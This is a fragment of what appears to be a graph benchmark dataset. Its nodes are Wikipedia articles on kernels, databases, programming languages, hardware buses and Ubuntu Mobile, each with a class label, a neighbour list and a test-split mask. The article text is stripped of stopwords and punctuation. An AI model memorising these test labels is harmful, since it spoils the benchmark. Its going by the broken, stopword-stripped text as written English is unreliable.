osfmk 7.3 freebsd monolithic kernel similar micro kernels except include additional code kernel-space increase performance kernels represent compromise implemented developers demonstrated pure micro kernels provide high performance types kernels extensions micro kernels properties monolithic kernels unlike monolithic kernels types kernels unable load modules runtime hybrid kernels micro kernels non-essential code kernel-space order code run quickly would user-space hybrid kernels compromise monolithic microkernel designs implies running services network stack filesystem kernel space reduce performance overhead traditional microkernel still running kernel code device drivers servers user space many traditionally monolithic kernels least adding actively exploiting module capability well known kernels linux kernel modular kernel essentially parts built core kernel binary binaries load memory demand important note code tainted module potential destabilize running kernel many people become confused point discussing micro kernels possible write driver microkernel completely separate memory space test going live kernel module loaded accesses monolithic portion memory space adding needs therefore opening doorway possible pollution advantages modular hybrid kernel modules generally communicate kernel using module interface sort interface generalized although particular given operating system always possible use modules often device drivers may need flexibility module interface affords essentially two system calls often safety checks done monolithic kernel may done twice disadvantages modular approach nanokernel delegates virtually services including even basic ones like interrupt controllers timer device drivers make kernel memory requirement even smaller traditional microkernel exokernels still-experimental approach operating system design differ types kernels functionality limited protection multiplexing raw hardware providing hardware abstractions top develop applications separation hardware protection hardware management enables application developers determine make efficient use available hardware specific program exokernels extremely small however accompanied library operating systems see also unikernel providing application developers functionalities conventional operating system major advantage exokernel-based systems incorporate multiple library operating systems exporting different api example one high level ui development one real-time control strictly speaking operating system thus kernel required run computer programs directly loaded executed bare metal machine provided authors programs willing work without hardware abstraction operating system support early computers operated way 1950s early 1960s reset reloaded execution different programs eventually small ancillary programs program loaders debuggers left memory runs loaded rom developed formed basis became early operating system kernels bare metal approach still used today video game consoles embedded systems general newer computers use modern operating systems kernels 1969 rc 4000 multiprogramming system introduced system design philosophy small nucleus upon operating systems different purposes could built orderly manner would called microkernel approach decade preceding unix computers grown enormously power point computer operators looking new ways get people use spare time machines one major developments era time-sharing whereby number users would get small slices computer time rate appeared connected slower machine development time-sharing systems led number problems one users particularly universities systems developed seemed want hack system get cpu time reason security access control became major focus multics project 1965 another ongoing issue properly handling computing resources users spent time staring terminal thinking input instead actually using resources computer time-sharing system give cpu time active user periods finally systems typically offered memory hierarchy several layers deep partitioning expensive resource led major developments virtual memory systems commodore amiga released 1985 among first certainly successful home computers feature advanced kernel architecture amigaos kernel executive component exec.library uses microkernel message-passing design kernel components like graphics.library direct access hardware memory protection kernel almost always running user mode special actions executed kernel mode user-mode applications ask operating system execute code kernel mode design phase unix programmers decided model every high-level device file believed purpose computation data transformation instance printers represented file known location data copied file printed systems provide similar functionality tended virtualize devices lower level devices files would instances lower level concept virtualizing system file level allowed users manipulate entire system using existing file management utilities concepts dramatically simplifying operation extension paradigm unix allows programmers manipulate files using series small programs using concept pipes allowed users complete operations stages feeding file chain single-purpose tools although end result using smaller programs way dramatically increased flexibility well ease development use allowing user modify workflow adding removing program chain unix model operating system consists two parts first huge collection utility programs drive operations second kernel runs programs unix programming standpoint distinction two fairly thin kernel program running supervisor mode acts program loader supervisor small utility programs making rest system provide locking i/o services programs beyond kernel n't intervene user space years computing model changed unix treatment everything file byte stream longer universally applicable although terminal could treated file byte stream printed read seem true graphical user interface networking posed another problem even network communication compared file access low-level packet-oriented architecture dealt discrete chunks data whole files capability computers grew unix became increasingly cluttered code also modularity unix kernel extensively scalable kernels might 100,000 lines code seventies eighties kernels modern unix successors like linux 13 million lines modern unix-derivatives generally based module-loading monolithic kernels examples linux kernel many distributions well berkeley software distribution variant kernels freebsd dragonflybsd openbsd netbsd macos apart alternatives amateur developers maintain active operating system development community populated self-written hobby kernels mostly end sharing many features linux freebsd dragonflybsd openbsd netbsd kernels and/or compatible apple first launched classic mac os 1984 bundled macintosh personal computer apple moved nanokernel design mac os 8.6 modern macos originally named mac os x based darwin uses hybrid kernel called xnu created combining 4.3bsd kernel mach kernel microsoft windows first released 1985 add-on ms-dos dependence another operating system initial releases windows prior windows 95 considered operating environment confused operating system product line continued evolve 1980s 1990s windows 9x series adding 32-bit addressing pre-emptive multitasking ended release windows 2000 microsoft also developed windows nt operating system similar interface intended high-end business users line started release windows nt 3.1 1993 introduced general users release windows xp october 2001—replacing windows 9x completely different much sophisticated operating system line continues windows 10 architecture windows nt kernel considered hybrid kernel kernel contains tasks window manager ipc managers client/server layered subsystem model supervisory program supervisor computer program usually part operating system controls execution routines regulates work scheduling input/output operations error actions similar functions regulates flow work data processing system historically term essentially associated ibm line mainframe operating systems starting os/360 operating systems supervisor generally called kernel 1970s ibm abstracted supervisor state hardware resulting hypervisor enabled full virtualization i.e capacity run multiple operating systems machine totally independently hence first system called virtual machine vm although mach developed carnegie mellon university 1985 1994 best-known general-purpose microkernel microkernels developed specific aims l4 microkernel family mainly l3 l4 kernel created demonstrate microkernels necessarily slow newer implementations fiasco pistachio able run linux next l4 processes separate address spaces additionally qnx microkernel principally used embedded systems open-source software minix originally created educational purposes focussed highly reliable self-healing microkernel os",
    "neighbors": [
      6148,
      6155,
      6158,
      2064,
      4113,
      2066,
      8209,
      25,
      10273,
      6180,
      6186,
      4151,
      8248,
      4153,
      59,
      8259,
      69,
      8268,
      6221,
      86,
      89,
      10333,
      4192,
      97,
      4194,
      4201,
      8298,
      2168,
      2178,
      2179,
      132,
      10376,
      10382,
      144,
      2196,
      6296,
      2201,
      10394,
      6300,
      6301,
      10397,
      2224,
      178,
      6325,
      4279,
      6329,
      6333,
      10433,
      8386,
      8388,
      10436,
      2248,
      6352,
      6361,
      8410,
      4316,
      6377,
      2282,
      242,
      6393,
      8441,
      8445,
      2303,
      4355,
      6403,
      10499,
      273,
      2321,
      292,
      6436,
      2345,
      6445,
      2355,
      8499,
      4409,
      6457,
      2363,
      6459,
      2365,
      2366,
      8510,
      321,
      10564,
      2375,
      4423,
      4424,
      2380,
      2383,
      4432,
      2391,
      6491,
      10590,
      8551,
      6508,
      2415,
      370,
      376,
      2424,
      8573,
      2432,
      8576,
      394,
      4492,
      4493,
      4505,
      6557,
      2462,
      4515,
      421,
      4521,
      2477,
      4525,
      8628,
      10676,
      439,
      4572,
      485,
      10725,
      10730,
      10731,
      10732,
      495,
      8687,
      499,
      6652,
      2558,
      2560,
      10755,
      8713,
      10761,
      6675,
      10774,
      10776,
      4637,
      543,
      4643,
      551,
      561,
      8754,
      10801,
      10803,
      10809,
      4669,
      10813,
      8767,
      576,
      2625,
      4673,
      8774,
      2637,
      6760,
      10856,
      6763,
      10860,
      2671,
      6768,
      8816,
      6772,
      4727,
      634,
      636,
      639,
      641,
      6787,
      2692,
      8837,
      10883,
      10891,
      6797,
      8852,
      8857,
      671,
      673,
      10920,
      2733,
      8879,
      2737,
      2738,
      6837,
      4790,
      8889,
      8902,
      2761,
      2763,
      8907,
      10971,
      8928,
      6890,
      6898,
      2811,
      2813,
      8957,
      11013,
      8966,
      8976,
      8977,
      787,
      789,
      6934,
      4887,
      8992,
      2853,
      11045,
      810,
      4908,
      823,
      6968,
      11075,
      11079,
      6988,
      4956,
      4957,
      2910,
      2914,
      868,
      9064,
      7020,
      2925,
      4978,
      7027,
      11123,
      2933,
      11130,
      7039,
      4998,
      7057,
      9107,
      2967,
      5022,
      926,
      9119,
      11171,
      5029,
      935,
      7082,
      11180,
      11184,
      5041,
      948,
      9141,
      5049,
      954,
      9151,
      11204,
      11205,
      9166,
      975,
      9171,
      981,
      9176,
      7133,
      7135,
      3042,
      5093,
      3049,
      9194,
      3055,
      5103,
      5105,
      3058,
      5109,
      3062,
      5110,
      5115,
      3068,
      11262,
      11263,
      9218,
      3079,
      3089,
      7187,
      7188,
      11283,
      3097,
      9244,
      11294,
      11297,
      7204,
      9253,
      5158,
      11301,
      11305,
      5165,
      7217,
      1080,
      3129,
      5177,
      11322,
      9276,
      11325,
      5190,
      3147,
      7249,
      1107,
      3160,
      3162,
      9308,
      3167,
      1122,
      11363,
      5220,
      3178,
      7285,
      9335,
      1147,
      9340,
      3197,
      1150,
      5247,
      9342,
      11388,
      11390,
      9353,
      11410,
      11411,
      9366,
      7319,
      9370,
      7325,
      5279,
      3235,
      11430,
      3241,
      3245,
      3248,
      3250,
      9407,
      1216,
      7382,
      7385,
      11481,
      9436,
      1247,
      5343,
      9441,
      11489,
      1253,
      1255,
      7403,
      11501,
      9466,
      3323,
      9468,
      1278,
      7435,
      11539,
      5397,
      1304,
      5406,
      1316,
      7463,
      3369,
      7477,
      1339,
      7483,
      5452,
      9549,
      5457,
      11601,
      7507,
      11603,
      7511,
      5467,
      3426,
      5484,
      7534,
      11635,
      5492,
      5506,
      3463,
      7561,
      5514,
      11667,
      11675,
      1436,
      3487,
      5536,
      1442,
      1444,
      1445,
      3496,
      11689,
      9643,
      1455,
      7601,
      3529,
      9677,
      3542,
      9689,
      9693,
      5598,
      5603,
      1508,
      1515,
      5619,
      1524,
      3587,
      1540,
      7689,
      3600,
      3603,
      1561,
      3615,
      9759,
      9762,
      1574,
      3624,
      3637,
      9784,
      3650,
      3654,
      9807,
      1623,
      5721,
      3681,
      3684,
      1637,
      3685,
      9835,
      5742,
      9844,
      9882,
      9887,
      3745,
      7845,
      9899,
      7854,
      9907,
      9910,
      5823,
      1736,
      9931,
      9932,
      5840,
      3815,
      7913,
      1776,
      7920,
      5877,
      1804,
      3865,
      10013,
      10016,
      7975,
      7983,
      5938,
      1846,
      3903,
      7999,
      10052,
      5959,
      10062,
      10063,
      5976,
      10080,
      8033,
      3940,
      5990,
      3948,
      8063,
      8065,
      10113,
      8069,
      6023,
      3978,
      10127,
      10138,
      6044,
      8092,
      1952,
      6049,
      10149,
      6055,
      6056,
      6058,
      8106,
      10156,
      8119,
      6075,
      8124,
      6078,
      4039,
      4040,
      8136,
      6093,
      6100,
      2010,
      10215,
      4073,
      4074,
      6128,
      8177,
      8180,
      10235,
      2045,
      8191
    ],
    "mask": "Test"
  },
  {
    "node_id": 5364,
    "label": 1,
    "text": "NuoDB:nuodb nuodb database company based cambridge massachusetts founded 2008 nuodb recognized gartner magic quadrant technology used dassault systèmes kodiak uae exchange alfa systems firm founded 2008 nimbusdb changed name nuodb 2011 company co-founders barry s. morris became company ceo jim starkey nuodb based cambridge massachusetts nuodb patented elastically scalable database patent filed march 8 2011 approved july 17 2012 u.s. patent 8,224,860 states inventor jim starkey 2012 firm received 12 million total venture capital 2013 gartner listed nuodb niche player magic quadrant operational database management systems boston business journal mass high tech named nuodb one 2014 innovation stars february 2014 nuodb announced extension series b funding round led dassault systèmes round added 14.2 million company funding morgenthaler ventures hummer winblad venture partners longworth venture partners participated round 2015 gartner listed nuodb time visionary magic quadrant operational database management systems morris company founding ceo became executive chairman july 2015 bob walmsley previously executive vice president sales services promoted ceo nuodb raised 17 million financing round 2016 existing investors including dassault systèmes hummer winblad venture partners longworth venture partners morgenthaler ventures time company raised total 59.7 million funding causesquare announced partnership nuodb 2017 nuodb became official database social engagement platform connects causes organizations donors volunteers nuodb elastic sql database cloud applications nuodb database sql compliant called newsql distributed object architecture works cloud means new server added order scale-out database database runs faster database scales without sharding database distributes tasks amongst several processors avoid bottlenecks data uses peer-to-peer messaging route tasks nodes acid compliant database uses tiered approach — comprising multiple redundant tiers transaction engines te storage managers sm approach helps scale data predictably cloud nuodb domains consist several redundant tes sms run platform adding database capacity done adding tes sms nuodb 2.6 release added support active-active database deployments across multiple amazon web services aws availability zones unlike database systems nuodb makes possible expand databases adding servers rather simply replacing hardware system designed align – expand upon – ibm computer scientist edgar f. codd ’ 12 rules relational databases adds ability run anywhere elastic scalability nonstop availability single logical database distributed security system process 1 million transactions per second available free developer version community edition professional paid version enterprise version community edition expanded january 31 2017 enable scale-out across multiple hosts",
    "neighbors": [
      8640,
      10048,
      2980,
      6950,
      10413,
      10286,
      10389,
      7802,
      5403
    ],
    "mask": "Test"
  },
  {
    "node_id": 5365,
    "label": 9,
    "text": "ATS_(programming_language):ats programming language ats applied type system programming language designed unify programming formal specification ats support combining theorem proving practical programming use advanced type systems past version computer language benchmarks game demonstrated performance ats comparable c c++ programming languages using theorem proving strict type checking compiler detect prove implemented functions susceptible bugs division zero memory leaks buffer overflow forms memory corruption verifying pointer arithmetic reference counting program compiles additionally using integrated theorem-proving system ats ats/lf programmer may make use static constructs intertwined operative code prove function attains specification ats derived mostly ml ocaml programming languages earlier language dependent ml author incorporated language latest version ats1 anairiats released v0.2.12 2015-01-20 first version ats2 postiats released september 2013 primary focus ats support theorem proving combination practical programming theorem proving one prove instance implemented function produce memory leaks also prevents bugs might otherwise found testing incorporates system similar proof assistants usually aim verify mathematical proofs—except ats uses ability prove implementations functions operate correctly produce expected output simple example function using division programmer may prove divisor never equal zero preventing division zero error let say divisor x computed 5 times length list one prove case non-empty list x non-zero since x product two non-zero numbers 5 length practical example would proving reference counting retain count allocated block memory counted correctly pointer one know quite literally prove object deallocated prematurely memory leaks occur benefit ats system since theorem proving occurs strictly within compiler effect speed executable program ats code often harder compile standard c code compiles programmer certain running correctly degree specified proofs assuming compiler runtime system correct ats proofs separate implementation possible implement function without proving programmer desires according author hongwei xi ats efficiency largely due way data represented language tail-call optimizations generally important efficiency functional programming languages data stored flat unboxed representation rather boxed representation codice_1 expresses predicates algebraic types predicates pseudo‑code somewhat similar ats source see valid ats source ats code fact int int proof type non tail-recursive factorial proposition theorem proving construction dataprop evaluation fact1 n-1 returns pair proof_n_minus_1 result_of_n_minus_1 used calculation fact1 n proofs express predicates proposition fact n r implies fact n r remember dataprop fact int int note int x also int x monovalued type int x value fun fact n nat n n int n r int fact n r int r implement main0 argc argv added single file compiled follows compilation work various back end c compilers e.g gcc garbage collection used unless explicitly stated -d_ats_gcats compiles gives expected result val x int char 15 c // x.0 15 x.1 c' '| separator functions return wrapped result value evaluation predicates ... universal quantification sortdef nat int 0 // prelude ∀ ∈ int ... // .. ∀ b ∈ type ... fun ype ptr_get0 l addr pf l p ptr l l case+ val+ type+ viewtype+ ... dataviews often declared encode recursively defined relations linear resources nowiki dataview array_v viewt ype+ int addr /nowiki datatypes lists dataviewtype similar datatype linear dataviewtype programmer allowed explicitly free deallocate safe manner memory used storing constructors associated dataviewtype local variables stack array allocation see val var declarations",
    "neighbors": [
      2304,
      9345,
      1474,
      5796,
      7487,
      369,
      9490,
      4791,
      9432,
      7386,
      2045,
      6239
    ],
    "mask": "Test"
  },
  {
    "node_id": 5366,
    "label": 4,
    "text": "Cyber_Security_Agency_(Singapore):cyber security agency singapore cyber security agency singapore csa singaporean government agency prime minister office administratively managed ministry communications information provides centralised oversight national cyber security functions works public private sector leads protect singapore ’ critical services energy banking sectors formed 1 april 2015 agency also engages various industries stakeholders heighten cyber security awareness well ensure development singapore ’ cyber security headed ministry defence deputy secretary technology david koh minister-in-charge s. iswaran ministry communications information cyber security agency took functions previously carried singapore infocomm technology security authority sitsa ministry home affairs sitsa set 2009 national specialist authority overseeing operational security csa also took roles undertaken then-infocomm development authority ida singapore computer emergency response team facilitates detection resolution prevention security-related incidents internet agency builds upon government ’ cyber security capabilities include strategy policy development cyber security operations industry development outreach well public communications engagement organised events singapore international cyber week sicw 2016 5,000 attendees close 50 countries sicw also saw launch singapore ’ cybersecurity strategy second edition sicw held 18 21 september 2017 singapore also host 2nd asean ministerial conference cybersecurity year october 2016 prime minister launched singapore ’ cybersecurity strategy aim create resilient trusted cyber environment singapore four pillars underpin strategy part singapore cybersecurity strategy internet access civil servants work station cut-off david koh chief executive newly formed cyber security agency said officials realised much data secure way secure attack surface like building zillion windows doors fire escapes security experts commented move may raise defense cyber attack slightly risk damaging productivity civil servants working four dozen statutory boards cutting people serve",
    "neighbors": [
      10190
    ],
    "mask": "Test"
  },
  {
    "node_id": 5367,
    "label": 8,
    "text": "Hierarchical_Cluster_Engine_Project:hierarchical cluster engine project hierarchical cluster engine hce foss complex solution construct custom network mesh distributed network cluster structure several relations types nodes formalize data flow processing goes upper node level central source point nodes backward formalize management requests handling multiple source points support native reducing multiple nodes results aggregation duplicates elimination sorting internally support powerful full-text search engine data storage provide transactions-less transactional requests processing support flexible run-time changes cluster infrastructure many languages bindings client-side integration apis one product build c++ language project became successor associative search machine asm full-text web search engine project developed 2006 2012 ioix ukraine set applications used construct different distributed solutions like remote processes execution management data processing including text mining nlp web sites crawling including incremental periodic flexible adaptive scheduling rss feeds custom structured web sites data scraping include pre-defined custom scrapers xpath templates sequential optimized scraping algorithms web-search engine complete cycle including crawling scraping distributed search index based sphinx indexing engine corporate integrated full-text search based distributed sphinx engine index many another applied solutions similar business logic heart main component hce project hce-node application application integrates complete set base functionality support network infrastructure hierarchical cluster construction full-text search system integration hce application area hierarchical cluster engine hce-node roles cluster structure internally hce-node application contains seven basic handler threads handler acts special black-box messages processor/dispatcher used combination work one five different roles node dtm dc applications provided set functional tests demo operations automation scripts based linux shell bundle distribution provided zip archive needs environmental support get functionality ready linux os daemon application implements business-logic functionality distributed web crawler document data processor based dtm application main functionality hce-node drce functional object functionality uses web crawling processing another related tasks isolated session executable modules common business logic encapsulation also crawler contains raw contents storage subsystem based file system customized support key-value storage sql application uses several drce clusters construct network infrastructure mysql sqlite back-end indexed data sites urls contents configuration properties well key-value data storage processed contents pages documents additionally administrative user interface web-application available manage easy flexible way also ui implements several automation data collect process algorithms using schedules aggregation scraped data several projects creation data archives exporting data external sql database custom schema many statistical reports periodic data crawling scraping activity many linux os multi-thread daemon application implements business-logic functionality tasks management uses drce cluster execution environment manage tasks remote processes implements general management operations distributed tasks scheduling execution state check os resources monitoring application used parallel tasks execution state monitoring hierarchical network cluster infrastructure custom nodes connection schema multipurpose application aimed cover needs projects big data computations distributed data processing multi-host data processing os system resources balancing limitations supports several balancing modes including multicast random round-robin system resource usage algorithms also provides high level state check statistics diagnostic automation based natural hierarchy relations nodes supports messages routing tasks data balancing method tasks management set different role functionality separated console applications united chains get sequential data processing server-side functionality used self-sufficient tools utilities designed get common functional units typical web projects need get huge data web another sources pars convert process supports unified input-output interface json format messages interaction first implementation utilities application highlighter utility get fast parallel multi-algorithmic textual patterns highlighting provides cli ui works filter console tool uses json format protocol messages input output interaction highlight algorithm text processing gets search query string textual context input returns textual content marks entrances patterns search query additional stat information patterns usually lexical words depend stemming tokenizing processes complex constructions several pre-configured vm images vmware virtualbox uploaded get start process faster user name “ root ” password target user dts archive “ hce ” password vm files zipped gnu general public license version 2",
    "neighbors": [
      8554,
      8644,
      7983
    ],
    "mask": "None"
  },
  {
    "node_id": 5368,
    "label": 3,
    "text": "Industry_Standard_Architecture:industry standard architecture industry standard architecture isa 16-bit internal bus ibm pc/at similar computers based intel 80286 immediate successors 1980s bus largely backward compatible 8-bit bus 8088-based ibm pc including ibm pc/xt well ibm pc compatibles originally referred pc/at-bus also termed i/o channel ibm isa term coined retronym competing pc-clone manufacturers late 1980s early 1990s reaction ibm attempts replace at-bus new incompatible micro channel architecture 16-bit isa bus also used 32-bit processors several years attempt extend 32 bits called extended industry standard architecture eisa successful however later buses vesa local bus pci used instead often along isa slots mainboard derivatives bus structure still used ata/ide pcmcia standard compact flash pc/104 bus internally within super i/o chips isa bus developed team led mark dean ibm part ibm pc project 1981 compaq created term industry standard architecture isa replace pc compatible isa originated 8-bit system 16-bit version ibm bus introduced release ibm pc/at 1984 1988 32-bit extended industry standard architecture eisa standard proposed gang nine group pc-compatible manufacturers included compaq process retroactively renamed bus isa avoid infringing ibm trademark pc/at computer ibm designed 8-bit version buffered interface motherboard buses intel 8088 16/8 bit cpu ibm pc pc/xt 16-bit version upgrade motherboard buses intel 80286 cpu used ibm isa bus therefore synchronous cpu clock sophisticated buffering methods implemented chipsets interface isa much faster cpus isa designed connect peripheral cards motherboard allows bus mastering first 16 mb main memory addressable original 8-bit bus ran 4.77 mhz clock 8088 cpu ibm pc pc/xt original 16-bit bus ran cpu clock 80286 ibm pc/at computers 6 mhz first models 8 mhz later models ibm rt pc also used 16-bit bus isa also used non-ibm compatible machines motorola 68k-based apollo 68020 amiga 3000 68030 workstations short-lived hobbit later powerpc-based bebox companies like dell improved bus performance 1987 ibm replaced bus proprietary micro channel architecture mca mca overcame many limitations apparent isa also effort ibm regain control pc architecture pc market mca far advanced isa many features would later appear pci however mca also closed standard whereas ibm released full specifications circuit schematics isa computer manufacturers responded mca developing extended industry standard architecture eisa later vesa local bus vlb vlb used electronic parts originally intended mca component manufacturers already equipped manufacture eisa vlb backwards-compatible expansions isa bus users isa-based machines know special information hardware adding system handful devices essentially plug-n-play rare users frequently configure parameters adding new device irq line i/o address dma channel mca done away complication pci actually incorporated many ideas first explored mca though directly descended eisa trouble configuration eventually led creation isa pnp plug-n-play system used combination modifications hardware system bios operating system software automatically manage resource allocations reality isa pnp could troublesome become well-supported architecture final days pci slots first physically-incompatible expansion ports directly squeeze isa motherboard first motherboards largely isa including pci slots mid-1990s two slot types roughly balanced isa slots soon minority consumer systems microsoft pc 99 specification recommended isa slots removed entirely though system architecture still required isa present vestigial way internally handle floppy drive serial ports etc. software compatible lpc bus created isa slots remained years towards turn century common see systems accelerated graphics port agp sitting near central processing unit array pci slots one two isa slots near end late 2008 even floppy disk drives serial ports disappearing extinction vestigial isa lpc bus chipsets horizon pci slots rotated compared isa counterparts—pci cards essentially inserted upside-down allowing isa pci connectors squeeze together motherboard one two connectors used slot time allowed greater flexibility attachment ata hard disk interface directly descended 16-bit isa pc/at ata origins hardcards integrated hard disk drive hdd hard disk controller hdc onto one card best awkward worst damaging motherboard isa slots designed support heavy devices hdds next generation integrated drive electronics drives moved drive controller drive bay used ribbon cable simple interface board connect isa slot ata basically standardization arrangement plus uniform command structure software interface hdc within drive ata since separated isa bus connected directly local bus usually integration chipset much higher clock rates data throughput isa could support ata clear characteristics 16-bit isa 16-bit transfer size signal timing pio modes interrupt dma mechanisms pc/xt-bus eight-bit isa bus used intel 8086 intel 8088 systems ibm pc ibm pc xt 1980s among 62 pins demultiplexed electrically buffered versions 8 data 20 address lines 8088 processor along power lines clocks read/write strobes interrupt lines etc power lines included −5 v ±12 v order directly support pmos enhancement mode nmos circuits dynamic rams among things xt bus architecture uses single intel 8259 pic giving eight vectorized prioritized interrupt lines four dma channels originally provided intel 8237 3 dma channels brought xt bus expansion slots 2 normally already allocated machine functions diskette drive hard disk controller pc/at-bus 16-bit 80286- version pc/xt bus introduced ibm pc/at bus officially termed i/o channel ibm extends xt-bus adding second shorter edge connector in-line eight-bit xt-bus connector unchanged retaining compatibility 8-bit cards second connector adds four additional address lines total 24 8 additional data lines total 16 also adds new interrupt lines connected second 8259 pic connected one lines first 4 × 16-bit dma channels well control lines select 8- 16-bit transfers 16-bit bus slot originally used two standard edge connector sockets early ibm pc/at machines however popularity at-architecture 16-bit isa bus manufacturers introduced specialized 98-pin connectors integrated two sockets one unit found almost every at-class pc manufactured mid-1980s isa slot connector typically black distinguishing brown eisa connectors white pci connectors motherboard devices dedicated irqs present slots 16-bit devices use either pc-bus pc/at-bus irqs therefore possible connect 6 devices use one 8-bit irq 5 devices use one 16-bit irq time 4 devices may use one 8-bit dma channel 3 devices use one 16-bit dma channel originally bus clock synchronous cpu clock resulting varying bus clock frequencies among many different ibm clones market sometimes high 16 20 mhz leading software electrical timing problems certain isa cards bus speeds designed later motherboards integrated chipsets used separate clock generator clock divider either fixed isa bus frequency 4 6 8 mhz allowed user adjust frequency via bios setup used higher bus frequency isa cards certain hercules-compatible video cards instance could show significant performance improvements memory address decoding selection 8 16-bit transfer mode limited 128 kib sections leading problems mixing 8- 16-bit cards could co-exist 128 kib area memcs16 line required set based value la17-23 isa still used today specialized industrial purposes 2008 iei technologies released modern motherboard intel core 2 duo processors addition special i/o features equipped two isa slots marketed industrial military users invested expensive specialized isa bus adaptors available pci bus versions similarly adek industrial computers releasing motherboard early 2013 intel core i3/i5/i7 processors contains one non-dma isa slot pc/104 bus used industrial embedded applications derivative isa bus utilizing signal lines different connectors lpc bus replaced isa bus connection legacy i/o devices recent motherboards physically quite different lpc looks like isa software peculiarities isa 16 mib dma limit corresponds full address space intel 80286 cpu used original ibm likely stick around explained history section isa basis development ata interface used ata a.k.a ide recently serial ata sata hard disks physically ata essentially simple subset isa 16 data bits support exactly one irq one dma channel 3 address bits isa subset ata adds two ide address select chip select lines unique signal lines specific ata/ide hard disks cable select/spindle sync line addition physical interface channel ata goes beyond far outside scope isa also specifying set physical device registers implemented every ata ide drive full set protocols device commands controlling fixed disk drives using registers ata device registers accessed using address bits address select signals ata physical interface channel operations ata hard disks performed using ata-specified protocols ata command set earliest versions ata standard featured simple protocols basic command set comparable command sets mfm rll controllers preceded ata controllers latest ata standards much complex protocols instruction sets include optional commands protocols providing advanced optional-use features sizable hidden system storage areas password security locking programmable geometry translation deviation isa ata isa bus remained locked single standard clock rate backward hardware compatibility ata interface offered many different speed modes could select among match maximum speed supported attached drives kept adding faster speeds later versions ata standard 133 mb/s ata-6 latest forms ata ran much faster isa provided connected directly local bus faster isa bus 16-bit ata/ide interface 8-bit xt-ide also known xta interface hard disks nearly popular ata become xt-ide hardware fairly hard find xt-ide adapters available 8-bit isa cards xta sockets also present motherboards amstrad later xt clones well short-lived line philips units xta pinout similar ata eight data lines two address lines used physical device registers completely different meanings hard drives seagate st351a/x could support either type interface selected jumper many later successor motherboards integrated hard drive interface relied separate hard drive interface plugged isa/eisa/vlb slot even 80486 based units shipped mfm/rll interfaces drives instead increasingly common at-ide commodore built xt-ide based peripheral hard drive memory expansion unit a590 amiga 500 500+ computers also supported scsi drive at-ide type interfaces entered keyboard-cased amiga line upon introduction a600 a1200 integrated interface 44 pin connector many owners removed 2,5 inch bracket installed 3,5 inch drive adapter cable pcmcia specification seen superset ata standard pcmcia hard disk interfaces included pcmcia flash drives allows mutual configuration port drive ata mode de facto extension pcmcia flash drives additionally allow simple ata mode enabled pulling single pin low pcmcia hardware firmware unnecessary use ata drive connected ata port pcmcia flash drive ata adapters thus simple inexpensive guaranteed work every standard pcmcia flash drive adapters used generic pcmcia ports pcmcia interface much complex ata although modern computers physical isa buses ibm compatible computers — x86 x86-64 non-mainframe non-embedded — isa buses allocated physical address space embedded controller chips southbridge cpus provide services temperature monitoring voltage readings buses isa devices ieee started standardization isa bus 1985 called p996 specification however despite even books published p996 specification never officially progressed past draft status still existing user base old computers isa cards still manufactured e.g usb ports complete single board computers based modern processors usb 3.0 sata",
    "neighbors": [
      5368,
      3201,
      6913,
      8707,
      4228,
      11627,
      6150,
      7151,
      780,
      274,
      6419,
      4244,
      533,
      6806,
      9723,
      408,
      8090,
      7452,
      799,
      4641,
      2594,
      2723,
      4642,
      5629,
      1958,
      8487,
      11169,
      6187,
      1324,
      7215,
      7983,
      8625,
      2994,
      3769,
      3272,
      8136,
      8909,
      4047,
      5457,
      10833,
      9686,
      4699,
      11100,
      2525,
      5088,
      1121,
      10337,
      3299,
      3943,
      1515,
      5356,
      8301,
      5358,
      2159,
      1776,
      2161,
      6128,
      499,
      2803,
      3445,
      6129,
      6510,
      1400,
      8561,
      3323,
      8700,
      2941,
      639
    ],
    "mask": "Test"
  },
  {
    "node_id": 5369,
    "label": 2,
    "text": "Ubuntu_Mobile:ubuntu mobile ubuntu mobile internet device edition discontinued ubuntu distribution planned run intel mobile internet device platform x86 mobile computers based intel atom processor planned use gnome framework hildon basis gui equipment producers would able customize distributions including options flash java custom interfaces ubuntu mobile stopped development 2009 successor ubuntu phones announced january 2 2013 according canonical ubuntu mobile would provide uncompromised web 2.0 experience include features web browsing email media camera voip instant messaging gps blogging digital tv games contacts calendars regular software updates designed fully operable using simple touchscreen interface june 2008 ubuntu mobile 8.04 released ubuntu mobile ended active development 2009 9.10 alpha 6 mark shuttleworth announced ubuntu 14.04 ubuntu support smartphones tablets smart tvs smart screens car head units smartwatches resulted successor ubuntu touch project announced january 2 2013",
    "neighbors": [
      11271,
      546,
      9253,
      11305,
      3626,
      5677,
      7727,
      56,
      59,
      4673,
      3654,
      1101,
      7246,
      1107,
      7253,
      1110,
      3162,
      607,
      4192,
      10851,
      3685,
      9320,
      6763,
      9324,
      10860,
      2671,
      3189,
      8315,
      5755,
      8316,
      8829,
      11388,
      11391,
      8837,
      8326,
      10394,
      6301,
      673,
      3745,
      3245,
      7854,
      3248,
      7857,
      2738,
      4790,
      8907,
      8909,
      4305,
      2259,
      10971,
      5343,
      8423,
      4841,
      6890,
      7913,
      7920,
      9971,
      9461,
      6393,
      8957,
      7435,
      4364,
      2321,
      5397,
      4887,
      8476,
      4383,
      5410,
      10530,
      6445,
      2864,
      3903,
      7492,
      2375,
      5962,
      4951,
      10080,
      2914,
      5990,
      10599,
      9064,
      7020,
      2925,
      7534,
      2930,
      9074,
      1396,
      3969,
      10127,
      11669,
      3478,
      926,
      10149,
      8112,
      439,
      10687,
      4039,
      975,
      3537,
      8147,
      3542,
      9693,
      3550,
      6625,
      7140,
      485,
      10215,
      495,
      8177,
      499,
      11263
    ],
    "mask": "None"
  },
  {
    "node_id": 5370,
    "label": 2,
    "text": "Boot_image_control:boot image control boot image control strategy common way reduce total cost ownership organizations large numbers similar computers used users common needs e.g large corporation government agency considered part enterprise application integration larger shops use term since applications part boot image modify boot image desktop os windows vista includes tools boot image control displacing third party tools mac os always flexible handling boot drives simplifying control reducing need move boot images around drives increasingly boot image control network operating system function often large computer vendor required explain bid response rfp intend simplify purchaser boot image control problems attendant service costs total cost ownership correlates strongly total number different images total number computers major cost concern three basic strategies commonly advised organizations closely track control set common standards acquisition new computer hardware typically practice thin client strategy strategy reduce total cost operations depends several factors departmental boot image strategy seems flexible complexity creating managing several large boot images determining department needs upgrade applications easily outweigh especially users object try subvert discipline waiting regular boot turn upgrade machines user allowed discipline soon degrades effectively bunch home computer whose issues really diagnosable comparable situation thin clients may become practical answer many organizations use thin clients applications require high security involve unreliable users repurpose older machines continued use much simplifies boot image control facilitating centralized management computers many advantages control images simpler disadvantages thin clients many organizations try gain advantages thin clients without disadvantages treating many standard machines terminals much greater capabilities buy new computers put demanding applications administrators perform regular 